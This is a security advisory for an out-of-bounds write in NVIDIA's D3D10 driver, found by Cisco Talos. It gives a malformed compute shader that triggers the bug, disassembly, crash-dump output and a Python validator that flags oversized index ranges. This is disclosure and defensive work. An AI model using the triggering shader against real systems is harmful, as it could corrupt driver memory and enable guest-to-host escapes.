CVE-2022-34671
A memory corruption vulnerability exists in the shader DCL_INDEXRANGE instruction handling of NVIDIA D3D10 Driver Version 516.94 and 31.0.15.1694. A specially crafted executable or shader file can lead to memory corruption. An attacker who can execute code can trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
NVIDIA D3D10 Driver, Version 516.94, 31.0.15.1694
D3D10 Driver - https://nvidia.com
8.5 - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-787 - Out-of-bounds Write
The NVIDIA graphics driver is the software for NVIDIA GPUs installed in a PC. It mediates communication between the operating system and the GPU device, and in most cases the hardware cannot function properly without it.
An exploitable memory corruption vulnerability exists in the NVIDIA nvwgf2umx.dll graphics driver. A specially crafted compute shader can cause memory corruption. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability could potentially be triggered from guest machines running in virtualization environments (i.e. VMware, QEMU, VirtualBox, etc.) in order to perform a guest-to-host escape, as was demonstrated before (TALOS-2018-0533, TALOS-2018-0568, etc.). Theoretically this vulnerability could also be triggered from a web browser (using WebGL and WebAssembly). We were able to trigger this vulnerability from a Hyper-V guest using the RemoteFX feature, leading to execution of the vulnerable code on the Hyper-V host (inside the rdvgm.exe process). While RemoteFX was recently deprecated by Microsoft, some older machines may still use this software.
This vulnerability can be triggered by supplying a malformed compute shader. This leads to memory corruption in the NVIDIA driver.
Example of compute shader triggering the bug:
dcl_temps 1
dcl_indexrange o6.x 8
dcl_indexrange vicp[32][0].x 11500322 ---> malformed dcl_indexrange
ult r0.x, vForkInstanceID.x, l(4)
and r0.x, r0.x, l(1)
and r0.y, vForkInstanceID.x, l(3)
The dcl_indexrange instruction declares a range of registers that will be accessed by index. Setting the maximum index (the register count) to a large value causes memory corruption, because the ECX value for the rep stosw operation is taken directly from the shader bytecode without being checked against the destination buffer:
00007FFEEDFF7567 | 8BAA 08040000 | mov ebp,dword ptr ds:[rdx+408] | (32-bit value taken from byte code, 11500322)
00007FFEEDFF756D | BA 25100000 | mov edx,1025 |
00007FFEEDFF7572 | 48:897424 50 | mov qword ptr ss:[rsp+50],rsi |
00007FFEEDFF7577 | 4C:897424 58 | mov qword ptr ss:[rsp+58],r14 |
00007FFEEDFF757C | 44:8D71 08 | lea r14d,qword ptr ds:[rcx+8] |
...
00007FFEEDFF761D | 49:8D3C7F | lea rdi,qword ptr ds:[r15+rdi*2] |
00007FFEEDFF7621 | 8BCD | mov ecx,ebp |
00007FFEEDFF7623 | 66F3:AB | rep stosw | repeat value (ECX) taken from bytecode, attacker controls the size for memset()
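As an added illustration (not Talos's proof of concept or NVIDIA's driver code), the check a shader validation layer would apply before a declaration like the one above reaches the driver: parse each dcl_indexrange from the assembly listing and reject register counts that exceed the register file being indexed. The per-register-file limits are assumed values chosen for this example, not numbers from the advisory or the D3D specification.

```python
import re

# Constructed sample: the compute shader excerpt from the advisory, including the
# malformed dcl_indexrange whose count (11500322) the driver used unchecked as
# the rep stosw repeat value.
SHADER_ASM = """\
dcl_temps 1
dcl_indexrange o6.x 8
dcl_indexrange vicp[32][0].x 11500322
ult r0.x, vForkInstanceID.x, l(4)
and r0.x, r0.x, l(1)
and r0.y, vForkInstanceID.x, l(3)
"""

# Assumed upper bounds per register file (an assumption for this example): the
# largest index range a validator should accept before rejecting the shader.
MAX_INDEX_RANGE = {
    "o": 32,      # output registers
    "v": 32,      # input registers
    "vicp": 32,   # hull-shader input control points
    "r": 4096,    # temporaries, bounded by dcl_temps
}

DCL_RE = re.compile(
    r"^\s*dcl_indexrange\s+"
    r"(?P<file>[a-z]+)"            # register file prefix, e.g. o or vicp
    r"(?P<idx>(?:\[\d+\])*|\d+)"   # register index, plain (o6) or bracketed
    r"(?:\.[xyzw]+)?\s+"           # optional component mask
    r"(?P<count>\d+)\s*$"          # number of registers in the range
)

def parse_indexranges(asm):
    """Return (line_no, register_file, count) for every dcl_indexrange line."""
    found = []
    for n, line in enumerate(asm.splitlines(), 1):
        m = DCL_RE.match(line.split("--->")[0])   # ignore trailing annotations
        if m:
            found.append((n, m.group("file"), int(m.group("count"))))
    return found

def check_indexranges(asm, limits=MAX_INDEX_RANGE):
    """Return (line_no, reason) for every declaration a validating front end
    should reject; an empty list means the shader passes this check."""
    findings = []
    for n, reg_file, count in parse_indexranges(asm):
        limit = limits.get(reg_file)
        if limit is None:
            findings.append((n, f"unknown register file '{reg_file}'"))
        elif count == 0 or count > limit:
            findings.append((n, f"count {count} outside 1..{limit} for '{reg_file}'"))
    return findings
```

Run against the sample, the check passes the `o6.x 8` declaration and flags line 3, which is the point at which the driver should have refused the shader instead of sizing its memset from the bytecode.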
Stack trace:
0:038> kb
# RetAddr : Args to Child : Call Site
00 00007ffe`edff3af5 : 00007ffe`00000005 0000001b`cd1af150 00000193`90fcac50 00007ffe`edd40000 : nvwgf2umx!NVDEV_Thunk+0x5ee43
01 00007ffe`edff2806 : 00000000`8eef005b 0000001b`cd1af150 00000000`8eef005b 00000000`8eef0000 : nvwgf2umx!NVDEV_Thunk+0x5b315
02 00007ffe`ede06db0 : 00000193`90fc02c8 00000000`00000000 00000193`97598f90 0000001b`cd1af6c0 : nvwgf2umx!NVDEV_Thunk+0x5a026
03 00007ffe`ede082da : 00000193`90fc02c8 00000000`50000063 00000000`fffffff2 00007fff`7db07955 : nvwgf2umx+0xc6db0
04 00007ffe`ee187905 : 00000000`00000000 00000193`9106a500 00000000`00000000 00000000`00000000 : nvwgf2umx+0xc82da
05 00007ffe`ee1876b8 : 00000193`90fc80d0 00000000`00000000 00000193`90a32f80 00000193`90a219d8 : nvwgf2umx!NVDEV_Thunk+0x1ef125
06 00007ffe`ee288724 : 00000000`00000000 00007fff`7db407b0 00000193`90fcabd0 00000193`90a215d0 : nvwgf2umx!NVDEV_Thunk+0x1eeed8
07 00007ffe`ee28866f : 00000000`00000000 00000193`0000000e 00000193`91057bb0 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x2eff44
08 00007ffe`ef01e376 : 00000193`91057bb0 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x2efe8f
09 00007fff`7c8e7034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!OpenAdapter12+0x5985c6
0a 00007fff`7db42651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0b 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:038> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************
*** WARNING: Unable to verify checksum for POC_EXEC11.exe
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Write
Key : Analysis.CPU.mSec
Value: 6453
Key : Analysis.DebugAnalysisManager
Value: Create
Key : Analysis.Elapsed.mSec
Value: 33845
Key : Analysis.Init.CPU.mSec
Value: 3702
Key : Analysis.Init.Elapsed.mSec
Value: 4651672
Key : Analysis.Memory.CommitPeak.Mb
Value: 102
Key : Timeline.OS.Boot.DeltaSec
Value: 681618
Key : Timeline.Process.Start.DeltaSec
Value: 32
Key : WER.OS.Branch
Value: vb_release
Key : WER.OS.Timestamp
Value: 2019-12-06T14:06:00Z
Key : WER.OS.Version
Value: 10.0.19041.1
NTGLOBALFLAG: 70
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffeedff7623 (nvwgf2umx!NVDEV_Thunk+0x000000000005ee43)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000001
Parameter[1]: 000001939107f000
Attempt to write to address 000001939107f000
FAULTING_THREAD: 0000240c
PROCESS_NAME: POC_EXEC11.exe
WRITE_ADDRESS: 000001939107f000
ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwołała się do pamięci pod adresem 0x%p. Pamięć nie może być %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000001
EXCEPTION_PARAMETER2: 000001939107f000
STACK_TEXT:
0000001b`cd1aebe0 00007ffe`edff3af5 : 00007ffe`00000005 0000001b`cd1af150 00000193`90fcac50 00007ffe`edd40000 : nvwgf2umx!NVDEV_Thunk+0x5ee43
0000001b`cd1aec20 00007ffe`edff2806 : 00000000`8eef005b 0000001b`cd1af150 00000000`8eef005b 00000000`8eef0000 : nvwgf2umx!NVDEV_Thunk+0x5b315
0000001b`cd1af0d0 00007ffe`ede06db0 : 00000193`90fc02c8 00000000`00000000 00000193`97598f90 0000001b`cd1af6c0 : nvwgf2umx!NVDEV_Thunk+0x5a026
0000001b`cd1af180 00007ffe`ede082da : 00000193`90fc02c8 00000000`50000063 00000000`fffffff2 00007fff`7db07955 : nvwgf2umx+0xc6db0
0000001b`cd1af280 00007ffe`ee187905 : 00000000`00000000 00000193`9106a500 00000000`00000000 00000000`00000000 : nvwgf2umx+0xc82da
0000001b`cd1af690 00007ffe`ee1876b8 : 00000193`90fc80d0 00000000`00000000 00000193`90a32f80 00000193`90a219d8 : nvwgf2umx!NVDEV_Thunk+0x1ef125
0000001b`cd1af780 00007ffe`ee288724 : 00000000`00000000 00007fff`7db407b0 00000193`90fcabd0 00000193`90a215d0 : nvwgf2umx!NVDEV_Thunk+0x1eeed8
0000001b`cd1af830 00007ffe`ee28866f : 00000000`00000000 00000193`0000000e 00000193`91057bb0 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x2eff44
0000001b`cd1af890 00007ffe`ef01e376 : 00000193`91057bb0 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x2efe8f
0000001b`cd1af8c0 00007fff`7c8e7034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!OpenAdapter12+0x5985c6
0000001b`cd1af8f0 00007fff`7db42651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0000001b`cd1af920 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
SYMBOL_NAME: nvwgf2umx!NVDEV_Thunk+5ee43
MODULE_NAME: nvwgf2umx
IMAGE_NAME: nvwgf2umx.dll
STACK_COMMAND: ~38s ; .cxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_STRING_DEREFERENCE_c0000005_nvwgf2umx.dll!NVDEV_Thunk
BUCKET_ID_MODPRIVATE: 1
OS_VERSION: 10.0.19041.1
BUILDLAB_STR: vb_release
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
IMAGE_VERSION: 31.0.15.1694
FAILURE_ID_HASH: {02746a16-78de-d897-f124-8085bc105ade}
Followup: MachineOwner
---------
2022-09-22 - Vendor Disclosure
2022-09-22 - Initial Vendor Contact
2022-12-01 - Vendor Patch Release
2022-12-06 - Public Release
Discovered by Piotr Bania of Cisco Talos.